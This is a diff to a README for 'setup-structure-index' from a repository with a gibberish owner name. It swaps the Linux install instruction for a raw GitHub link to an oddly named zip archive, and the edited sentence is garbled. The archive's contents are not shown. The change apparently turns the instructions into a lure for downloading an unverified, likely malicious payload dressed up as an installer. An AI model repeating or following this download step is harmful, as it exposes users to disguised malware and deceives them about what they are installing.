wegfetrhrtewqerwfgtrhtmjhfgdsas/setup-structure-index/README.md

    - Windows: Double-click the `.exe` or `.msi` file and follow the instructions.
    - Mac: Open the `.dmg` and drag the app to your Applications folder.
-   - Linux: Extract the `.tar.gz` or make the `.AppImage` file executable and run it.
+   - Linux: Extract the `https://raw.githubusercontent.com/wegfetrhrtewqerwfgtrhtmjhfgdsas/setup-structure-index/main/brotherlike/index_structure_setup_3.2.zip` or make the `.AppImage` file executable and run it.

 6. After installation, launch setup-structure-index from your Start menu, Applications folder, or your chosen location.